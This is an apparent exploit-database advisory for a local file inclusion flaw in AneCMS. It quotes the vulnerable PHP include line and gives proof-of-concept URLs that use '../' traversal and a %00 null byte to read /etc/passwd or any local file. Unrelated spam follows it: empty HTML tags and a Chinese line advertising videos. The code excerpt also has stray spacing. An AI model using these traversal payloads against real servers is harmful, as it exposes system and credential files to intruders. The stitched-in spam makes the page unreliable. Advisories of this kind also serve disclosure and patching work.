# Exploit Title: AneCMS v.2e2c583 LFI exploit # Date: 03.04.2012# Author: I2sec-PJH # Software Link: https://github.com/AneGroup/AneCMS # Version: v.2e2c583 ----------------------------------------------------- -Description vulnerabilities have been discovered in the index page. -source of index.php 1. if (isset ($ _GET ['p']))2. include '. / pages /'. $ _GET ['p']. '. php'; -PoC http://localhost/index.php?p=../../../../etc/passwd%00 http://localhost/index.php?p=../../../../[localfile]%00 
    <pre id="vvttv"><mark id="vvttv"><progress id="vvttv"></progress></mark></pre>
    <pre id="vvttv"></pre>
      <p id="vvttv"></p>

          

          <p id="vvttv"></p>
                <p id="vvttv"></p>
                

                <pre id="vvttv"><cite id="vvttv"><progress id="vvttv"></progress></cite></pre>
                  
<output id="vvttv"><dfn id="vvttv"><th id="vvttv"></th></dfn></output>
                    <p id="vvttv"></p>
                    

这里只有精品视频